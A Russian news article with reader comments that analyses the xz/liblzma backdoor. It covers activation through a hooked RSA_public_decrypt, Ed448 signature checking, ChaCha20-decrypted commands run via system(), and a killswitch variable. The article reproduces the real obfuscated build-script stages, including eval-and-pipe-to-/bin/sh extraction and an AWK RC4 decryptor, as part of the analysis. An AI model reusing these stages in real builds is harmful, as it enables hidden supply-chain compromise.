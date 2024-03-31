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Разбор логики активации и работы бэкдора в пакете xz

31.03.2024 10:18

Доступны предварительные результаты обратного инжиниринга вредоносного объектного файла, встроенного в liblzma в результате кампании по продвижению бэкдора в пакет xz. Изначально предполагалось, что бэкдор позволяет обойти аутентификацию в sshd и получить доступ к системе через SSH. Более детальный анализ показал, что это не так и бэкдор предоставляет возможность выполнить произвольный код в системе, не оставляя следов в логах sshd.

В частности, перехватываемая бэкдором функция RSA_public_decrypt проверяет подпись хоста, используя фиксированный ключ Ed448, и в случае успешной проверки выполняет переданный внешним хостом код при помощи функции system() на стадии до сброса привилегий процессом sshd. Данные, содержащие код для исполнения, извлекаются из параметра "N", переданного в функцию RSA_public_decrypt (поле "n" из структуры rsa_st, содержащей переданный внешним хостом открытый ключ), проверяются по контрольной сумме и расшифровываются при помощи предопределённого ключа ChaCha20 на стадии до верификации цифровой подписи Ed448.

В качестве признака для активации бэкдора в sshd используется штатный механизм обмена хостовыми ключами. Бэкдор пользуется тем, что сертификаты OpenSSH включают открытый ключ лица, сформировавшего подпись, и реагирует только на ключ, подготовленный злоумышленником и соответствующий предопределённому фиксированному ключу Ed448. Если верификация подписи по открытому ключу не проходит или если целостность данных для исполнения не подтверждается, бэкдор возвращает управление штатным функциям SSH.

Так как закрытый ключ злоумышленника неизвестен, невозможно реализовать проверочный код, который позволил бы активировать бэкдор и реализовать сканер скомпрометированных хостов в сети. Исследователями подготовлен скрипт, демонстрирующий технику подстановки открытого ключа с произвольным содержимым в передаваемый SSH-клиентом сертификат OpenSSH, который будет обработан в перехваченной бэкдором функции RSA_public_decrypt.

Исследователи также заметили наличие конструкции, обезвреживающей бэкдор (killswitch) на локальной системе при наличии выставленной перед запуском sshd переменой окружения "yolAbejyiejuvnup=Evjtgvsh5okmkAvj".

Дополнительно можно отметить детальный разбор shell-конструкций, используемых для запутывания процесса извлечения объектного файла с бэкдором и его подстановки в библиотеку liblzma. Во время сборки пакета xz из скрипта build-to-host.m4 запускался код, который находил среди тестовых файлов архив bad-3-corrupt_lzma2.xz, заменял в нём некоторые символы, превращал в неповреждённый архив и извлекал из него shell-скрипт. 


  gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null`
...
  gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'
  gl_path_map='tr "\t \-_" " \t_\-"'

Полученный shell-скрипт по кусочкам извлекал из содержимого архива good-large_compressed.lzma ещё один shell-скрипт, пропуская определённые последовательности командами head и tail, и заменяя символы командой tr. 


####Hello####
# a few binary bytes here, but as it's a comment they are ignorred
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
eval `grep ^srcdir= config.status`
if test -f ../../config.status;then
eval `grep ^srcdir= ../../config.status`
srcdir="../../$srcdir"
fi
export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +939)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31233|tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh
####World####

В результате формировался достаточно сложный и объёмный shell-скрипт, извлекающий непосредственно файл с бэкдором из архива good-large_compressed.lzma, расшифровывающий его и встраивающий в liblzma. Среди прочего в скрипте присутствовала реализация механизма плагинов, позволяющая впоследствии поставлять дополнительные исполняемые компоненты через размещение новых тестовых архивов, не меняя good-large_compressed.lzma и bad-3-corrupt_lzma2.xz, а используя поиск по сигнатуре. В коде также был задействован дешифровщик на базе алгоритма RC4, реализованный на языке AWK: 


N=0
W=88664
else
N=88664
W=0
fi
xz -dc $top_srcdir/tests/files/$p | eval $i | LC_ALL=C sed "s/\(.\)/\1\n/g" | LC_ALL=C awk 'BEGIN{FS="\n";RS="\n";ORS="";m=256;for(i=0;i<m;i++){t[sprintf("x%c",i)]=i;c[i]=((i*7)+5)%m;}i=0;j=0;for(l=0;l<8192;l++){i=(i+1)%m;a=c[i];j=(j+a)%m;c[i]=c[j];c[j]=a;}}{v=t["x" (NF<1?RS:$1)];i=(i+1)%m;a=c[i];j=(j+a)%m;b=c[j];c[i]=b;c[j]=a;k=c[(a+b)%m];printf "%c",(v+k)%m}' | xz -dc --single-stream | ((head -c +$N > /dev/null 2>&1) && head -c +$W) > liblzma_la-crc64-fast.o || true


  1. Главная ссылка к новости (https://news.ycombinator.com/i...)
  2. OpenNews: В библиотеке xz/liblzma выявлен бэкдор, организующий вход через sshd
  3. OpenNews: Ретроспектива продвижения бэкдора в пакет xz
Лицензия: CC BY 3.0
Короткая ссылка: https://opennet.ru/60885-xz
Ключевые слова: xz, backdoor
При перепечатке указание ссылки на opennet.ru обязательно


Обсуждение (31) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.1, IdeaFix (ok), 10:48, 31/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +3 +/
    Так то красиво.... не васян делал, контора
     
     
  • 2.4, аннаним (?), 10:54, 31/03/2024 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    Очень сильно повезло что тормозило и стали копать.

    Как понимаю, дистры будут закручивать гайки после такого.

     
     
  • 3.16, Аноним (16), 11:24, 31/03/2024 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Интересно, как именно они будут это делать. Требовать паспорт с каждого разраба каждого пакета? Типа KYC идентификация.
     
     
  • 4.29, аннаним (?), 11:46, 31/03/2024 [^] [^^] [^^^] [ответить]  
    		• +/
    Такая бюрократия не спасёт от криптопаяльника
     
  • 2.7, Аноним (7), 10:58, 31/03/2024 [^] [^^] [^^^] [ответить]  
    		• +/
    У этого кода была куча проблем, потому и нашли. Не особо и качественный, получается. Профессионалы таких косяков не допускают. А ведь достаточно было проверять исходники на соответствие и сканировать их на предмет мутных eval.
     
  • 2.20, Максим (??), 11:30, 31/03/2024 [^] [^^] [^^^] [ответить]  
    		• +/
    Ну почему? В 90-х, например, были очень красивые полиморфные и шифрующиеся вирусы под MS-DOS, так что не стоит недооценивать силу Васянов)
     
     
  • 3.26, Аноним (7), 11:39, 31/03/2024 [^] [^^] [^^^] [ответить]  
    		• +/
    Да и сейчас такое есть. Экзешник немного модифицируется и ни один антивирь его не палит, а если не палит, можно уже устраивать атаки уже на него. Единственная проблема доставка пользователю.
     

  • 1.2, Аноним (2), 10:49, 31/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +4 +/
    Т.е. я правильно понимаю ситуацию - какой-то ноунейм пришёл и без проблем напросился мейнтейнером в проект, используемый в практически любом дистре, подмял его под себя, засунул туда бекдор и ни у кого не возникало никаких вопросов? При этом выяснилось все благодаря чистой случайности. Ноунейм накосячил в своём бекдоре, что привлекло внимание чела из майкрософта и он со скуки таки раскопал что к чему. А если бы не накосячил, или тот чел из майкрософта решил пойти попить пива вместо ковыряния в коде xz, то никто ничего не обнаружил бы.
    Страшно представить, сколько таких ноунеймов сидят во всей этих тысячах опенсорсных проектов и ждут своего часа выкатить вредоносный патч.
     
     
  • 2.5, Аноним (5), 10:55, 31/03/2024 [^] [^^] [^^^] [ответить]  
    		• +/
    Разумеется, без проблем. Потому что под дурака косить — это обно из любимых самооправданий злоумышленников.
     
  • 2.6, Аноним (6), 10:56, 31/03/2024 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    А прикинь сколько таких бекдоров уже зашито? Не все же неудачники как он
     
     
  • 3.14, Аноним (16), 11:19, 31/03/2024 [^] [^^] [^^^] [ответить]  
    		• +/
    Ну и не факт, что он только в одном проекте сидел. Может у него ещё десяток таких, где он пока не спалился. А если там ещё и целая компания таких бекдорщиков...
     
  • 2.9, Аноним (7), 11:02, 31/03/2024 [^] [^^] [^^^] [ответить]  
    		• +/
    А если это акция МС? Вон и в венде libarchive с бэкдорами нашли уже, они либо совсем поехавшие эту дрянь кривую тянуть вообще куда-то, либо целенаправленно выбирают максимально грязный опенсорс.
     
  • 2.11, Аноним (11), 11:04, 31/03/2024 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    Тысячи дистрибутивов, сотни мейнтейнеров, весь исходный код доступен и открыт и при этом вообще никто не проверяет НИЧЕГО. Тысячи глаз... скорее 1 случайность. За что они вообще пожертвования получают?
     
     
  • 3.12, Аноним (16), 11:17, 31/03/2024 [^] [^^] [^^^] [ответить]  
    		• –3 +/
    Всё так. Мантра про опенсорс открытый значит кто угодно может прочитать и потому там не может быть уязвимостей - не более чем буллшит. Никто ничего не читает, и открытость кода гарантирует ровно ничего.
     
     
  • 4.19, Аноним (19), 11:26, 31/03/2024 [^] [^^] [^^^] [ответить]  
    		• +/
    И всё равно это лучше, чем проприетарщина.
     
  • 4.23, Аноним (23), 11:32, 31/03/2024 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    > Никто ничего не читает

    Это правда

    > и открытость кода гарантирует ровно ничего.

    А это ложь. Открытость кода гарантирует, что код открыт. В закрытом коде даже прятать и извращаться с шелл-скриптами не пришлось бы

     
  • 4.25, Аноним (25), 11:36, 31/03/2024 [^] [^^] [^^^] [ответить]  
    		• +/
    "Никто", "ничего" - максимализм и маленький ум.
     
     
  • 5.28, Аноним (16), 11:44, 31/03/2024 Скрыто ботом-модератором     [к модератору]
    		• +/
     
  • 2.18, name (??), 11:26, 31/03/2024 Скрыто ботом-модератором     [к модератору]
    		• +/
     

     ....ответы скрыты (11)

  • 1.3, Аноним (3), 10:50, 31/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    >JavaScript Required

    Нифига не доступны.

     
  • 1.8, Аноним (8), 10:59, 31/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –3 +/
    > shell-скрипт
    > grep head tail tr sed awk

    может, пора уже выпилить этот колхоз из системы?

     
     
  • 2.10, Аноним (7), 11:04, 31/03/2024 [^] [^^] [^^^] [ответить]  
    		• +/
    Согласен, одно баша было бы достаточно, а пользователи устаревших шеллов пусть страдают.
     

  • 1.13, vitalif (ok), 11:17, 31/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –1 +/
    PLOT TWIST

    Выясняется что это АНБ, оно отправляет зондеркоманду к исходному автору ХЗ, и он впиливает обратно более лучшую версию бэкдора :DD

     
     
  • 2.22, Аноним (22), 11:31, 31/03/2024 Скрыто ботом-модератором     [к модератору]
    		• +/
     
  • 2.24, Аноним (7), 11:34, 31/03/2024 [^] [^^] [^^^] [ответить]  
    		• +/
    А в принципе вообще лишняя зависимость и неоправданно тормозная , везде где был... большой текст свёрнут, показать
     

  • 1.15, Аноним (15), 11:22, 31/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Это только начало. По умолчанию можно считать весь opensource скомпрометированным. Привет китайским и северокорейским друзьям.
     
  • 1.17, Аноним (17), 11:25, 31/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Добавьте ко всем ссылкам на Mastodon /embed в конец, чтобы открывалось без JS. За метод спасибо https://news.ycombinator.com/item?id=35885621
     
  • 1.21, Максим (??), 11:31, 31/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +1 +/
    Не должно быть блобов в СПО. Блоб == закладка.
     
     
  • 2.27, Аноним (25), 11:40, 31/03/2024 [^] [^^] [^^^] [ответить]  
    		• +/
    Аккуратненький выход за границы буфера и вот тебе зонд о котором знаешь только ты. А найдут его только через миллион лет археологи безопасники. Пусть даже твой код пишут на билбордах по всему городу. Если не хочешь эксплуатировать продай кому-нибудь они на конкурсе безопасников выиграют денежный приз.
     

  • 1.30, Аноним (-), 11:47, 31/03/2024 Скрыто ботом-модератором [﹢﹢﹢] [ · · · ]     [к модератору]
    		• +/
     
  • 1.31, Аноним (31), 11:50, 31/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Хорошо бы добавить в этот анализ упоминание, что все изложенное не имеет отношения к исходному openssh и применимо *исключительно* к патченой (systemd-notify) версии.
     

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